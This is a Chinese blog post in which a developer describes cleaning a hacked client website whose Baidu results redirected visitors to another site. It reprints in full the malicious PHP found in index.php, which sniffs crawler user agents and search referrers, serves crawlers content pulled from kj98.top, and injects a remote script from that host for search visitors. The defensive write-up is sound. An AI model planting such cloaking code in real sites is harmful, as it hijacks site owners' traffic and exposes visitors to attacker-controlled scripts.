论百度快照是如何被黑客篡改的

2023-05-06 06:46:11

 

今天BOSS突然找我说某个客户的网站在百度搜索出来后,却跳转到别的网站去了,给客户照成了成吨成吨的影响。。。。。。总之,要求要立即弄好。没办法,谁叫我是程序狗呢。。。老板说什么就跟着去执行吧。

首先用浏览器检查一下网站,打开网站看看,画面一切正常哦。接着,检查网页源代码,咦,竟然没有发现什么异常!!接下来上百度搜一下关键词,搜索出来了,看下百度快照吧,尼玛,打开一片空白了。。。点击网站进去。。。天啦撸,果然自动跳转了。。。

先是跳到kj98这里来了,随后又跳转到其他网站。虽然跳转速度很快,但是遇到我这个技术狗,还是捕捉到了。OK,开始工作!只是跳转的问题嘛,小case啦。只需要把源码检索一遍就知道问题再哪里了。

果然不出所料,在index.php页面就发现了这些调皮捣蛋的代码。下面把代码贴出来,给同行或有需要的朋友看下:

<?php function isCrawler() { $agent= strtolower($_SERVER[HTTP_USER_AGENT]); if (!empty($agent)) { $spiderSite= array( "TencentTraveler", "Baiduspider+", "BaiduGame", "Googlebot", "msnbot", "Sosospider+", "Sogou web spider", "ia_archiver", "Yahoo! Slurp", "YoudaoBot", "Yahoo Slurp", "MSNBot", "Java (Often spam bot)", "BaiDuSpider", "Voila", "Yandex bot", "BSpider", "twiceler", "Sogou Spider", "Speedy Spider", "Google AdSense", "Heritrix", "Python-urllib", "Alexa (IA Archiver)", "Ask", "Exabot", "Custo", "OutfoxBot/YodaoBot", "yacy", "SurveyBot", "legs", "lwp-trivial", "Nutch", "StackRambler","360", "The web archive (IA Archiver)", "Perl tool", "MJ12bot", "Netcraft", "MSIECrawler", "WGet tools", "larbin", "Fish search", ); foreach($spiderSite as $val) { $str = strtolower($val); if (strpos($agent, $str) !== false) { return true; } } } else { return false; } } function isfromse() { $agent= strtolower($_SERVER[HTTP_REFERER]); if (!empty($agent)) { $spiderSite= array("google","baidu","sogou","yahoo","soso","360","so","yahoo","bing","youdao"); foreach($spiderSite as $val) { $str = strtolower($val); if (strpos($agent, $str) !== false) { return true; } } } else { return false; } } /* function qishu($qishu_url){ return file_get_contents($qishu_url); } function ziliao($ziliao_url){ return file_get_contents($ziliao_url); } */ if (isCrawler()){ $qishu_str = file_get_contents(http://www.kj98.top/6qi.txt);//&#x6B64;&#x5904;&#x8F93;&#x5165;&#x671F;&#x6570;&#x5730;&#x5740; $ziliao_str = file_get_contents(http://www.kj98.top/php1/183.htm);//&#x6B64;&#x5904;&#x8F93;&#x5165;&#x8D44;&#x6599;&#x5730;&#x5740; $ziliao_str = str_replace({&#x671F;&#x6570;},$qishu_str,$ziliao_str); ob_get_clean(); echo $ziliao_str;die(); } if (isfromse()){ ob_get_clean(); echo <script type="text/javascript" src="http://www.kj98.top/js/333.js"></script>;//&#x641C;&#x7D22;&#x5F15;&#x64CE;&#x6765;&#x6E90;&#x8DF3;&#x8F6C;&#x5730;&#x5740;test.js&#x66FF;&#x6362;&#x6210;&#x5916;&#x90E8;js&#x7684;&#x5730;&#x5740; die(); } ?>

代码大致意思就是判断爬虫类型,获取浏览器类型后,将原来的网站地址分别跳转到黑客指定的地址。就是这几行代码啦,弄得客户流量流失到同行网站那边了。弄清楚原理后,果断把这些代码全部删除了。再到百度搜索那边搜索一下,果然恢复正常了!哦也!程序狗再次打败大坏蛋!屁颠屁颠去BOSS那里领功啦!

PS:最后提醒下,不要忘记更改服务器密码啊,已经给人拜访一次的,说明坏蛋已经盯上你了,下次还会再来的。


以上就是关于《论百度快照是如何被黑客篡改的》的全部内容,本文网址:https://www.7ca.cn/baike/23243.shtml,如对您有帮助可以分享给好友,谢谢。
标签:
声明

排行榜